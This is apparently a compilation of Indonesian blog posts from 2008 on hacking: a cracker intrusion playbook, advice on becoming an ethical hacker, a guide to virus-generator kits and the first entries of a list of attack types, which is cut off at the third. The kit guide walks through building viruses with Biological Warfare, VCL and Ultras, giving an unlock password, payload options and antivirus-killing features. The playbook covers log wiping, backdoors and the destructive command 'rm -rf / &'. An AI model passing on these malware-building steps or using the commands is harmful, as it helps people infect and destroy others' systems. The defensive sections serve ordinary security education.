Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini. tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI). http://www.kpli.or.id

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk.

Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk :

(1) Hosting web server mereka,

(2) Komunikasi e-mail dan

(3) Memberikan akses web / internet kepada karyawan-nya.

Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh.

Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya

(1) Menggunakan nslookup untuk menjalankan perintah 'ls ' ,
(2) Melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server,
(4) Menghubungkan diri ke mail server dan menggunakan perintah 'expn ', dan
(5) Mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan.

Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya.

Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan).

Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm –rf / &’.

Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi.

Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet.

Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

BAGAIMANA CARA MENJADI HACKER

2008-11-23T14:45:00.001+07:00

Bagaimana Cara Menjadi Seorang Hacker…?

Pertama-tama, untuk menjadi pakar di sebuah bidang dibutuhkan waktu. Tidak bisa menjadi hacker dalam satu atau dua minggu saja. Kalau menjadi script kiddies (yang hanya biasa menjalankan program) sih bisa saja. Tapi, biasanya ini menjadi bahan tertawaan. Sama halnya untuk menjadi seorang pemain sepak bola yang jagoan, atau menjadi musisi yang andal, dibutuhkan waktu untuk berlatih tahunan. Seperi halnya seorang ibu yang hamil, dibutuhkan waktu sekitar 9 bulan sebelum anaknya lahir. Bayi tidak bisa dipaksakan untuk lahir dalam waktu 1 bulan tanpa menimbulkan masalah. Untuk itu, dibutuhkan kesabaran untuk belajar, banyak membaca, berlatih, dan praktik. Jangan terburu-buru. Sabar!

Yang kedua, perlu diperhatikan masalah integritas. Menjadi hacker bukanlah menjadi orang yang senang merugikan dan merusak milik orang lain. Yang itu namanya cracker. Rugi dan percuma untuk menjadi cracker. Jika kita nakal dan merusak, maka orang lain tidak akan memberikan kesempatan kepada kita untuk belajar, apalagi untuk bekerja. (Apakah Anda akan mempercayai maling untuk belajar di rumah Anda? Apalagi untuk bekerja?) Jadilah orang yang jujur dan memiliki etos kerja yang tinggi. Khususnya di
bidang keamanan (security), integritas ini biasanya lebih diutamakan ketimbang kemampuan (skill).

Yang ketiga, buatlah “laboratorium” sendiri. Cara untuk melatih diri adalah dengan menggunakan komputer sendiri (tidak perlu merusak komputer orang lain). Harga komputer (bekas) sudah tidak mahal lagi. Tidak usah pakai komputer yang hebat-hebat. Komputer di rumah saya masih ada yang Pentium (I) 90MHz. (Bahkan ketika saya mulai bermain dengan Linux, computer saya hanya sekadar 386 SX, 16MHz, 2MB RAM.) Jika perlu, buat sebuah LAN yang paling tidak berisi dua komputer untuk mempraktikkan konsep LAN. Untuk menghubungkan dua buah komputer, tidak perlu pakai hub, cukup dengan menggunakan kabel UTP yang di-cross.

Yang keempat, banyak-banyak bereksperimen di laboratorium ini. Contohnya, coba rakit (compile) kernel Linux, jangan hanya sekadar memasang (install) dari CD saja. Jika sudah berhasil, coba juga untuk merakit program dari GNU, misalnya coba rakit paket C compiler gcc. Dengan banyak merakit program dari source code, kita menjadi terbiasa dengan dialek-dialek programming yang sering digunakan oleh programmer atau hacker hebat.

Yang kelima, dalam sebuah komunitas biasanya ada bahasa tertentu yang digunakan. Program atau tools yang ada biasanya menggunakan bahasa C, oleh sebab itu coba kuasai bahasa C. Setelah itu, kuasai juga shell (sh atau bash) script atau perl script karena banyak tools yang bentuknya merupakan scripting. Bahasa- bahasa pemrograman yang lain juga bagus untuk dipelajari, akan tetapi C, sh, dan perl merupakan bahasa yang utama untuk hacker.

Yang keenam, berguru kepada orang lain dapat dilakukan secara fisik, yaitu memang benar-benar dating bertemu dan melihat cara dia bekerja. Cara lain adalah dengan mengamati hasil karya guru tersebut dengan melihat source code dari program atau tools yang dia buat.

Yang ke tujuh, kemampuan membaca sangat penting. Membaca source code buatan orang lain pada mulanya memang tidak mudah. Namun kalau sudah sering dan kebetulan source code itu dibuat dengan baik karena disertai dengan komentar, maka membacanya lebih mudah. Selain source code, tools tersebut seringkali disertai dengan dokumentasi tentang konsep dan cara kerjanya. Baca juga dokumentasi ini. Bolak-balik di tulisan ini mengajak Anda untuk membaca. Memang membaca merupakan salah satu cara utama untuk meningkatkan ilmu. Saat ini sudah banyak buku komputer, pemrograman, dan Internet. Sayangnya, buku-buku ini kebanyakan untuk level pemula dan belum banyak yang terjun ke topik yang lebih dalam karena mungkin tidak ada pasarnya. Saya sarankan juga untuk belajar bahasa Inggris, karena suka tidak suka informasi dan bacaan terbaru (ataupun bacaan yang klasik) masih dalam bahasa Inggris. Yes?

...hacker bukanlah menjadi orang yang senang merugikan dan merusak milik orang lain...

DENGAN APA MEMBUAT VIRUS..?

2008-11-22T17:15:00.007+07:00

Pembicaraan tentang virus seakan-akan tidak ada habisnya. Bak seorang artis yang selalu menarik perhatian. Lenggak-lenggoknya mempesona baik kawan maupun lawan. Makhluk yang bisa menggandakan diri dengan menginfeksi program lain dan mengacak-acak komputer ini selalu saja menarik perhatian banyak orang. Lihat aja sifatnya yang selalu “kucing-kucingan” dengan antivirus. Daya sebarnya yang sebagiannya luar biasa. Atau pun daya hancurnya yang mampu membuat orang mengurut dada dan mengeluarkan sumpah serapah …
Banyaknya pemberitaan mengenai virus, membuat kita berpikir, apakah begitu mudah membuat virus. Sebagian pembaca mungkin juga bertanya-tanya bagaimana caranya membuat “seekor” virus, dan apa yang dibutuhkan untuk membuatnya.
Pada artikel ini penulis akan menjawab pertanyaan tersebut dengan memaparkan perangkat-perangkat yang diperlukan untuk membuat sebuah virus. Termasuk juga di dalamnya adalah perangkat-perangkat “instant kit” yang tergolong perangkat bawah tanah dunia komputer. Dengan “instant kit” ini, seseorang dapat membuat virus secara cepat.
Cara penggunaannya pun cukup sederhana, sehingga seorang anak kecil yang baru mengenal komputer dapat membuat virus dengan mudah. Semudah dan secepat membuat mie instan.
Marilah berpikir positif. Mengesampingkan maksud untuk membuat “geger”, tulisan ini ditujukan hanya untuk memperluas wawasan Anda mengenai virus komputer. Dan bukan membuka gerbang yang mendorong orang berbondong-bondong membuat virus sehingga memaksa Bapak Norton dan McAfee serta programmer antivirus yang lain untuk bekerja lembur mencari vaksin untuk virusnya. Anda pasti setuju bahwa pengetahuan adalah “the most basic” dalam membentengi diri dari serangan virus. Untuk membuat “seekor” virus, yang diperlukan disamping perangkat-perangkat adalah kemampuan memprogram dengan perangkat-perangkat tersebut. Pembahasan ini hanya mencakup perangkat-perangkatnya saja. Sedangkan keahlian memprogram virus dengan bahasa pemrogramannya akan terus berkembang sejalan dengan bertambahnya pengalaman dan kreativitas seseorang.

Compiler Biasa
Bila Anda menjelajah ke dalam folder-folder dalam hard disk komputer Anda, Anda akan mendapati file – file dengan ekstensi .com atau .exe.
File-file tersebut dihasilkan dengan memprogram menggunakan suatu bahasa pemrograman tertentu dan dengan menggunakan compiler untuk bahasa tersebut. Secara sederhana, compiler berfungsi mengubah suatu kode bahasa menjadi format file EXE atau COM.
Virus sama halnya dengan program-program tersebut, dapat dihasilkan dengan memprogram dalam berbagai bahasa pemrograman yang ada. Bedanya virus dengan program-program yang lain adalah virus mempunyai kemampuan untuk menggandakan diri. Rutin pengganda inilah yang mencirikan sifat virus. Tentunya rutin pengganda yang dapat menginfeksi file lain.
Anda dapat membuat virus dengan menggunakan bahasa pemrograman Assembler, Pascal, C, C++, atau yang lainnya. Untuk mempelajari dasar-dasar pemrograman dalam bahasa tersebut
Anda dapat membeli buku-bukunya di toko buku kesayangan Anda. Dan dengan tekun mempelajarinya halaman demi halaman. Cara ini tergolong lama dan membutuhkan kepiawaian dalam memahami suatu bahasa komputer. Dan selalu saja ada jalan pintasnya. Lihat bahasan selanjutnya tentang instant kit.

Compiler yang digunakan untuk bahasa Assembler adalah Turbo Assembler atau biasa dikenal dengan TASM keluaran Borland. Anda dapat juga menggunakan Microsoft Assembler (MASM). Sedangkan compiler untuk bahasa Pascalnya dapat digunakan Turbo Pascal dan Borland C++ untuk bahasa C++ - nya. Gunakan compiler yang sesuai untuk bahasa pemrograman yang sesuai.
Dari seluruh bahasa yang ada, bahasa Assembler-lah yang mempunyai kehandalan dan paling baik dalam memprogram sebuah virus. Kedekatannya dengan bahasa mesin, menguntungkan seorang pemrogram virus untuk “berakrobatik” denganvirus yang akan dibuatnya. Misalnya memanipulasi interupsi-interupsi DOS. Virus yang dibuat dengan bahasa Assembler juga mempunyai ukuran yang sangat kecil dibandingkan dengan menggunakan bahasa yang lainnya. Akibatnya ukuran file induk yang diinfeksinya hanya bertambah beberapa byte saja. Sebuah modal dasar yang cukup penting untuk menghindari perubahan ukuran file yang terlalu kentara. Ini tentunya sangat mendukung usahanya untuk bersembunyi.
Karena kelebihan-kelebihan inilah posisi bahasa Assembler sulit digantikan dengan bahasa-bahasa yang lain. Lain halnya dengan virus macro. Tanpa menyebut perangkat “instant kit”, membuat virus jenis ini tergolong relatif lebih mudah ketimbang virus – virus yang lain. Anda tidak perlu menggunakan compiler untuk mengubah kode programnya menjadi file EXE atau COM. Perangkat yang dibutuhkan telah ada di depan mata. Segalanya telah disediakan oleh Microsoft sendiri. Pakai saja perangkat dengan nama Visual Basic Editor. Program ini merupakan program bawaan bila Anda meng-install aplikasi Microsoft Office. Bila Anda sedang menjalankan aplikasi Microsoft Word, pilihlah menu
Tools > Macro > Visual Basic Editor untuk menampilkan bidang kerja Visual Basic Editor.
Pada bidang kerja ini Anda dapat mengungkapkan ekspresi dan menumpahkan “kreativitas” Anda. Memprogram macro dengan Visual Basic Editor merupakan pisau bermata dua. Pada satu sisi, memprogram macro dapat membantu mengotomatisasikan tugas – tugas keseharian dalam bekerja dengan Microsoft Office. Tentunya ini akan sangat bermanfaat bagi seorang user. Pada satu sisi yang lain, dengan macro juga segala sesuatunya dapat diotomatisasikan sampai kelewat batas. Dengan perintah macro pengganda, macro-macro tersebut dapat “beranak-pinak”. Belum lagi bila macro tersebut mengandung rutin yang bersifat merusak. Inilah satu sisi yang merugikan. Tetapi bisa jadi menguntungkan bagi industri antivirus … J.

Instant Kit : “ Tambahkan sedikit air dan aduk rata”
Zaman terus berubah menuju kemudahan. Segala yang berbau instan merebak di mana – mana. Tidak hanya mie instan yang terkena pengaruhnya, tetapi juga dalam hal pembuatan virus. Dengan metode “tambahkan sedikit air dan aduk rata”, seekor virus telah siap saji. Berikut ini adalah program-program instant kit yang dapat digunakan untuk membuat virus dalam sekejap. Program-program ini dikenal dengan nama virus generator atau virus constructor. Dengan program virus generator ini, seseorang tidak perlu mempelajari bahasa pemrograman. Bahkan seorang anak kecil yang baru mengenal komputer dan sedang mempelajari buku “Microsoft Word for Beginners” pun dapat membuat virus.
Secara umum untuk membuat virus dengan virus generator ini Anda hanya perlu melengkapi setting – setting yang ada pada pilihan options di virus generator. Misalnya melengkapi nama virus, nama pembuat, jenis payload, tipe infeksi, enkripsi, dll. Begitu Anda menekan tombol “Generate” atau semisalnya, program virus generator akan membuatkan “seekor” virus untuk Anda berdasarkan settingan tersebut. Selamat datang di era kemudahan J.
Macam virus generator ini dapat dibedakan menjadi dua. Jenis pertama adalah virus generator yang akan membuat kode-kode virus berdasarkan pilihan setting yang Anda buat. Sehingga Anda dapat mempelajari atau melakukan pengeditan pada sourcecode virus tersebut. Langkah selanjutnya Anda harus melakukan proses kompilasi dengan menggunakan compiler yang sesuai dengan bahasa yang digunakan pada source code tersebut. Dengan demikian akan dihasilkan file virus dengan ekstensi COM atau EXE yang siap dijalankan. Meski sedikit menambah pekerjaan Anda, tetapi dengan virus generator ini Anda dapat menghasilkan source code virus untuk penelitian lebih lanjut. Virus generator jenis kedua, akan menghasilkan virus menurut setting-setting yang telah Anda tentukan terlebih dahulu. Virus generator ini tidak menghasilkan source code virus, tetapi langsung membuatkan file EXE atau COM. File yang dihasilkan adalah file virus yang aktif. Begitu dieksekusi, maka virus langsung beraksi. Berikut ini adalah berbagai virus generator yang berhasil penulis kumpulkan dan koleksi dari berbagai sumber.

Virus Generator Untuk Virus non Macro
Pada bagian ini akan penulis jelaskan mengenai virus generator yang digunakan untuk membuat virus-virus non macro. Yaitu virus generator yang “membangkitkan” file virus EXE atau COM.

Biological Warfare
Biological Warfare merupakan contoh virus generator yang akan membuatkan kode – kode virus untuk Anda dalam bahasa Assembler. Program ini dibuat oleh seseorang dengan nama MnemoniX pada tahun 1994.
Pada awal mula Anda menjalankan program ini, Anda akan diminta untuk untuk memasukkan password. Ketik saja “freak” dan tampilannya akan berganti seperti pada gambar di bawah ini.

Selanjutnya Anda hanya perlu melengkapi setting-setting-nya yang berjumlah 16 dari A sampai P. Berikut ini pilihan setting yang ada pada virus generator ini yang perlu diisi :

A. Text
B. Resident
C. Infect
D. Encryption
E. INT 24 Handler
F. Anti-trace code
G. Traverse directory
H. Infections per run
I. Check COM file size
J. Infect COMMAND.COM
K. EXE Marker
L. EXE overlay check
M. Time stamp (stealth/polymorph)
N. Infect on
O. Include activation routine
P. More directory stealth

Setelah semua pilihan setting diisi sesuai keinginan Anda, langkah terakhir adalah membuat virusnya dengan memilih menu menu V. Dalam waktu sekejap Biological Warfare akan membuatkan kode sumber virus Anda dalam bahasa Assembler. Masuklah ke direktori tempat program Biological Warfare ini berada, di sinilah Anda akan mendapati file yang memuat source code virus yang Anda buat.

Apa yang harus dilakukan dengan kode ini ? Jawabnya sederhana. Gunakan saja compiler Turbo Assembler untuk mengubahnya menjadi file virus yang siap dijalankan. Bila Anda cukup memahami bahasa Assembler, Anda dapat melakukan modifikasi pada source code tersebut untuk menambahkan rutin-rutin virus yang diperlukan.

Ding Lik’s Millenium C Virus Generator
Virus generator ini dibuat oleh seseorang yang menamai dirinya sebagai Ding Lik of Shadow Dancer pada tahun 1999. Virus generator ini merupakan jenis virus generator yang akan membuatkan kode sumber untuk Anda dalam bahasa C. Pilihan setting yang ada di program ini juga tergolong sangat sedikit. Hanya terdapat tiga buah setting yaitu :
1. Author
2. Vir name
3. Vir ID

Setelah melengkapi setting-setting tersebut, Anda dapat memilih menu File > Go. Kemudian pada direktori tempat program ini berada akan terdapat file Viral.C yang memuat kode sumber dari virus yang baru saja Anda buat dalam bahasa C.

Selanjutnya Anda dapat menggunakan Turbo C atau compiler bahasa C yang lain untuk proses kompilasinya.

Virus Creation Laboratory
Program instant kit ini pada versi 1.00-nya dibuat oleh seseorang dengan nama Nowhere Man dan Nuke pada tahun 1992. Dan dibuat dengan menggunakan Borland C++ versi 3.0. Dengan menggunakan generator ini Anda dapat membuat virus-virus dengan tipe appending, overwriting, spawning, disamping juga trojan horse dan logic bomb. Anda dapat “berkreasi” dengan Virus Creation Laboratory ini secara luas. Karena program ini menyediakan pilihan setting yang cukup banyak. Yang tidak kalah menariknya Anda juga dapat menambahkan efek-efek tertentu pada virus yang akan Anda buat. Sebagian efek – efek tersebut adalah :
1. Change low RAM
2. Clear the screen
3. Cold reboot
4. Disable LPT Port
5. Display a string
6. Erase File
7. Lock up the computer
8. Machine gun sound
9. Warm reboot

Disamping itu daya infeksi virus pun dapat diatur dengan menggunakan menu Options > Virulence.Setelah melengkapi setting-setting program VCL ini, pilih saja menu Make > Create ASM, sehingga virus generator ini akan membuatkan file Assembler untuk Anda. Atau menu Make > Create COM untuk hasil akhir file COM.

Program – progam instan pembuat virus non macro ternyata masih cukup banyak di dunia bawah tanah ini. Contoh-contoh lainnya yang berhasil penulis kumpulkan adalah NRLG, Satanic Brain, Easy Trojan, Spamacidal, TSR Time Bomb, Virus Construction Set, Virus Researcher’s Toolkit, Ansi Bomb Generator, Ansi Bomb Kit, Bayros Virus Creation Kit, dan masih banyak yang lainnya.

Virus Generator Untuk Virus Macro
Mari kita lanjutkan pembicaraan mengenai virus generator. Di bagian ini akan penulis paparkan cara kerja beberapa virus generator untuk membuat virus macro. Serupa dengan instant kit sebelumnya, penggunaan virus generator jenis ini pun tergolong sangat mudah. Inilah sebagian virus generator tersebut.

Ultras Construction Kit
Virus generator dengan ukuran file sebesar 410 KB ini diproyeksikan untuk menghasilkan virus macro untuk aplikasi Word 6.0 dan Word 7.0. Meskipun sudah ketinggalan zaman, Anda masih dapat bereksperimen dan meneliti lebih jauh tentang virus-virus macro yang dihasilkan dari generator ini. Terlebih lagi generator ini akan menghasilkan kode-kode virus untuk Anda pada direktori tempat program ini berada. Sehingga Anda dapat mempelajari kodenya atau melakukan modifikasi. Ketika pertama kali Anda menjalankan generator ini, akan tampil kotak selamat datang dengan tiga tombol. Setelah menekan tombol OK, tampillah jendela utama Ultras Construction Kit.

Pilihan setting pada program ini tergolong cukup banyak. Pada menu Infect, Anda dapat memilih macro-macro yang akan diinfeksi, yaitu macro autoclose, autonew, autoexec, dan autoexit. Untuk menghindari pendeteksian, dapat ditambahkan sifat “stealth” dari virus yang bersangkutan. Payload yang dibawa Ultras Construction Kit juga tergolong banyak, Anda bisa memilih salah satunya atau semuanya J. Payload-ayload tersebut adalah new icon, kill desktop, exit Windows, document info, kill Windows 95, message box, kill files, set password, registers in Word, random password, kill Windows files, kill program files, kill DII, dan random insert.

Yang juga tak kalah menariknya adalah virus generator ini membunuh banyak program-program antivirus. Termasuk Norton Antivirus dan juga McAfee. Hal ini akan sangat mendukung lolosnya virus-virus buatan Ultras Contruction Kit ini dari “seleksi alam”. Karena memang antivirus adalah predatornya yang paling dominan. Berikut ini antivirus – antivirus yang termasuk dalam daftar buruan Ultras Construction Kit :
1. Anti Virus Pro
2. eSafe
3. F- Prot
4. PC – Cillin
5. Quick Heal
6. FWIN
7. Dr. Solomon
8. F – Macro
9. McAfee
10. Norton Antivirus
11. Thunder Byte, dan
12. ViruSafe.

Bila pilihan setting tersebut telah Anda lengkapi, lanjutkan dengan menekan tombol Ok pada jendela utama Ultras Construction Kit. Dan beri nama virusnya dan tekan tombol Ok sampai tampilnya kotak dialog “Make Virus”. Akhiri dengan menekan tombol “Make” dan jadilah sebuah file dengan tipe text yang memuat kode-kode virus berdasarkan pilihan setting di atas.

Smoothie’s Macro Virus Creator 2000
Instant kit atau virus generator ini dibuat oleh seorang yang mengaku bernama
Smoothie Da Hustla of Zero Gravity, dan didedikasikan untuk istrinya Chiqui. Program
ini diproyeksikan untuk menghasilkan virus-virus macro yang menyerang Microsoft
Word 2000.

Pilihan setting yang perlu diisi tidak banyak, tetapi cukup untuk membuat Anda
bereksperimen dengan virus macro. Setting-setting tersebut adalah :
1. Nama pembuat
2. Nama virus
3. Komentar
4. Asal virus
5. Waktu penginfeksian
6. Waktu tampilnya pesan komentar
7. Tempat virus dibuat

Selanjutnya tekan saja tombol “Create” dan virus generator akan membuatkan
kode virus macro untuk Anda.

Halaman tabloid ini memang tidak cukup untuk menjelaskan semua virus generator berbasis virus macro. Beberapa virus generator sejenis yang lainnya adalah Walrus Macro Virus Generator yang merupakan perangkat untuk membuat virus macro untuk Word 97 dan Word 2000, Class Poppy Construction Kit, Class Macro Kit, Mister Spocks Virus Generator, Word 97 Macro Virii Creation Kit, dan masih banyak deretan yang lainnya. Bila Anda rajin bertandang ke dunia bawah tanah, Anda akan menemui lebih banyak lagi.

15 JENIS SERANGAN CRACKER

2008-11-22T14:33:00.008+07:00

Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang keamanan.
Tools maupun teknik yang digunakan cracker kebanyakan adalah variasi dari serangan yang mereka lakukan sebelumnya. Sebagai Administrator baik system maupun jaringan ataupun end user, Anda haruslah banyak belajar dari pengalaman penyerangan yang terjadi sebelumnya(walaupun serangan tersebut terjadi pada orang lain) untuk menghindari serangan yang akan terjadi berikutnya.
Mengetahui jenis serangan sangat penting untuk menjaga stabilitas system, sehingga anda tidak perlu repot untuk menginstall system baru agar lebih aman, anda hanya perlu mempatch atau bahkan sedikit mengkonfigurasi system anda Mungkin bagi beberapa orang tulisan ini merupakan tulisan yang sangat mendasar, tapi tidak ada salahnya jika anda sebagai seorang Profesional untuk mereview sesuatu yang dasar dari waktu ke waktu.. Artikel ini bukan ditujukan untuk menyerang tetapi sebaliknya yaitu untuk bertahan, karena menurut hemat saya untuk bertahan anda harus tahu cara menyerang. Dalam artikel ini terdapat serangan yang sering dilakukan oleh cracker dan disetiap serangan mempunyai metode-metode tersendiri, contohnya saja dalam melakukan IP spoofing yang mempunyai banyak metode diantaranya
man in the middle attack. Dengan alasan diatas saya akan mencoba menggaris besarkan serangan-serangan umum yang sering dilakukan cracker dan harus diketahui oleh seorang Administrator maupun end user, sedangkan metode-metode yang lebih spesifik mungkin akan saya tuangkan dalam tulisan saya berikutnya baik itu penyerangan ataupun metode yang dilakukan untuk bertahan. Saya tahu tulisan berikut adalah jauh dari sempurna, untuk itu saran dan kritik sangat saya harapkan.

1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IPattacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker. Protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet

Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP) dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.

Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan. Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang. Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem

3. Unix Finger Exploits

